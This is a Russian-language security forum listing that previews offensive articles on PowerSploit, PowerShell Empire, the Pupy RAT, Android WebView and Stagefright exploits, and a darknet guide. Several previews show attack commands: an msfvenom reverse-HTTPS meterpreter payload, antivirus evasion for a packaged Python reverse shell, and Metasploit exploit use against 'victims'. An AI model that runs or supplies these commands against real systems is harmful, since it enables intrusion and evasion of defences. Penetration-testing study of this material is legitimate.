• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Форум информационной безопасности - Codeby.net

PowerShell для хакера (часть I )

  • 32 771
  • 50
Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

Для начало сходим на гитхаб по ссылке:
Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
1.PNG


Жмакним на клавишу RAW - что бы...

Статья Знакомство с PowerShell Empire Framework

  • 48 236
  • 93
И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework.

PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская на павершеле,по этому легко поднять серверную часть на том же Kali Linux) и имеет в себе огромный функционал. Как я заметил что помимо того , что он используется для пост эксплуатации ( повышение привилегий, закрепленния в системе) он активно так очень используется и для активного фишинга,обхода антивируса и эксплуатации уязвимостей и одна из главных фишок - отлично используется для атак на Домен Контролеры. Конечно я все это хочу вам рассказать))) но сегодня мы слегка ознакомимся с интерфейсом фреймворка и базовы самые моменты)

Вобщем поехали)...

Статья Обход антивируса с помощью ctypes (python)

  • 10 973
  • 8
Привет колеги.
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.

Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))

Вообщем ближе к делу

И так проделываем следующие шаги:
1)Создаем шеллкод командой:
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
2.jpg

тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не...

Статья Быстрый способ получить meterpreter

  • 37 570
  • 33
Привет колеги. )
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.

Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.

Вообщем ближе к делу.
Качаем:
Код:
git clone https://github.com/trustedsec/unicorn.git
1.png

Запускаем.Смотрим help.
2.jpg

Выполняем команду
Код:
python unicorn.py...

PUPY Remote Administration Tool (RAT)

  • 14 572
  • 24
Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.

Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...

После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework...

Статья Обход антивируса (Reverse Python Shell) 100% FUD

  • 14 488
  • 41
Привет.С вами DarkNode )
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)

Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)

Состоит наш бэкдор опять же таки из двух частей:

Серверная часть
:
  • reverse_tcp.py - вредоносный питоновоский скрипт ,который запускается на стороне жертвы
  • может быть упакован в "exe" файл используя pyinstaller
На windows машине , выполните команду:
Код:
pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.py
для упаковки в бинарный файл...

Статья Метамодуль Внедрения известных учетных

  • 2 388
  • 0
Внедрение известных учетных данных - инструкция по началу работы

Метамодуль Внедрения известных учетных (Known Credentials Intrusion MetaModule) данных регистрируется в списке указанных служб и пытается открыть сеансы по ряду хостов с известными учетными данными в проекте. Вы можете запустить этот метамодуль, если вы хотите быстро получить программные оболочки хостов в вашем проекте.

Как попасть в Darknet? Полное Руководство !

  • 75 319
  • 1
Век интернета настал дорогие друзья ибо без него порой никак. Все знаю и умеют пользоваться популярными сервисами так сказать белым и контролируемым правительством и поисковиками интернетом. Но что же происходит на другой стороне, то что остается без контроля и что является запретным? Как же туда попасть? И что же там можно найти?

Что такое Darknet

Именно это место - а точнее все что нельзя найти простыми способами использованием поисковиков и называется Deepweeb (Глубокая паутина или же просто и изящно Darknet). Найти в даркнете можно что угодно от книг к самым большим извращениям и даже к покупке наркотиков и заказу убийств, насилию, и настоящих мега хакеров.


Возникает вопрос, а...

Статья Android WebView Exploit или взлом андроида по ссылке

  • 22 635
  • 26
Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)

5.png


Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:

1) Запустить метасплоит
2) Выбираем наш эксплойт:
Код:
use exploit/android/browser/webview_addjavascriptinterface
[IMG...

Статья Эксплойт Stagefright или еще один способ взлома телефона на базе андроид

  • 29 859
  • 63
Добрый вечер, я хочу поделиться с вами, как можно получить доступ к телефону на базе андройд используя вредоносную ссылку. Сразу оговорюсь , данный метод работает на старых версиях андройд. И так поехали...

Для этого мы будем использовать эксплойт Stagefright. Запускаем метасплойт командой msfconsole.
Дальше все делаем согласно скринам, я думаю так будет более понятно.

Указываем IP атакующего компа,порт,и другие данные...кто не знает свой ip, это можно сделать командой:
Код:
ifconfig

2.jpg


После запуска эксплойта, сгенерируется ссылка и запуститься сервер.Ссылку забрасываем жертве.

3.jpg


Итогом всему у вас будет открытая сессия.

4.jpg

Всем спасибо за внимания, удачного пентеста.